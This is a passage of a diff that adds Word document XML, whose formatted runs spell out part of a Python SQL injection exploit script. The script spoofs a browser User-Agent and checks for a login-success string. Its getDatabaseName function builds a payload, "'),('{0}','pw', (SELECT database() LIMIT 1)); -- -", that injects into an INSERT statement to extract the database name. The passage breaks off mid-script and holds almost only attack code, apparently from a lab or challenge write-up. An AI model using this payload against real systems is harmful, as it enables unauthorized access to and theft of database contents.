+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>={</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'User-Agent'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>})</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>search</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"You can logged in !"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>request</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>text</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t># Get database name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getDatabaseName</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"'),('</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','pw', (SELECT database() LIMIT 1)); -- -"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
